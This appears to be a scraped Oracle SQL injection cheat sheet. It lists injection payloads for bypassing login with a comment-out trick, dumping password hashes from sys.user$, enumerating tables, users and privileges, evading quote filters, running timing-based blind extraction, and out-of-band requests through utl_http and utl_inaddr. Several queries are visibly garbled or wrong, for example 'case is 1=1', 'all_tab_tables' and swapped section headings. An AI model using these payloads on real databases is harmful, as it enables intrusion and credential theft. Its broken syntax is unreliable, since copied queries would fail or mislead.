Oracledefault Databases
SYSTEM |
Available in all versions |
Sysaux |
Available in all versions |
Comment out Query
The following can used to comment out the rest of the query after your injection:
Example:
- SELECT * from Users WHERE username = ' OR 1=1 --' and password = ';
Testing Version
SELECT banner from v$version WHERE banner like ' oracle% '; |
SELECT banner from v$version WHERE banner like ' tns% '; |
SELECT version from V$instance; |
Notes:
- All SELECT statements in Oracle must contain a table.
dual
is a dummy table which can be used for testing.
Database Credentials
SELECT username from All_users; |
Available on all versions |
SELECT name, password from sys.user$; |
Privileged, <= 10g |
SELECT name, Spare4 from sys.user$; |
Privileged, <= 11g |
Database namescurrent Database
SELECT name from V$database; |
SELECT instance_name from V$instance |
SELECT Global_name from Global_name |
SELECT SYS. database_name from DUAL |
User Databases
SELECT DISTINCT owner from All_tables; |
Server Hostname
SELECT host_name from V$instance; (privileged) |
SELECT utl_inaddr.get_host_name from dual; |
SELECT utl_inaddr.get_host_name (' 10.0.0.1 ') from dual; |
SELECT utl_inaddr.get_host_address from dual; |
Tables and Columnsretrieving Tables
SELECT table_name from All_tables; |
Retrieving Columns
SELECT column_name from All_tab_columns; |
Find Tables from Column Name
SELECT column_name from all_tab_columns WHERE table_name = ' Users '; |
Find Columns from Table Name
SELECT table_name from all_tab_tables WHERE column_name = ' password '; |
Retrieving multiple Tables at once
SELECT RTRIM (Xmlagg (XMLELEMENT (E, table_name | | ‘,‘)). EXTRACT ('//text () '). EXTRACT ('//text () '), ', ') from All_tables; |
Avoiding the use of quotations
Unlike other RDBMS, Oracle allows table/column names to be encoded.
SELECT 0x09120911091 from dual; |
Hex Encoding. |
SELECT CHR (32) | | CHR (92) | | CHR (from dual); |
CHR () Function. |
String concatenation
SELECT ' A ' | | ' d ' | | ' Mi ' | | ' n ' from dual; |
Conditional statements
SELECT case is 1=1 then ' true ' ELSE ' false ' END from dual |
Timingtime Delay
SELECT utl_inaddr.get_host_address (' non-existant-domain.com ') from dual; |
Heavy Time delays
and (SELECT COUNT (*) from all_users T1, All_users T2, all_users T3, all_users T4, all_users T5) > 0 and + > ASCII ( SUBSTR ((SELECT username from all_users WHERE rownum = 1), 1, 1)); |
Privileges
SELECT privilege from Session_privs; |
SELECT grantee, granted_role from Dba_role_privs; (privileged) |
Out of Band Channelingdns requests
SELECT utl_http. REQUEST (' http://localhost ') from dual; |
SELECT utl_inaddr.get_host_address (' localhost.com ') from dual; |
Password Cracking
A Metasploit module for JTR can is found here.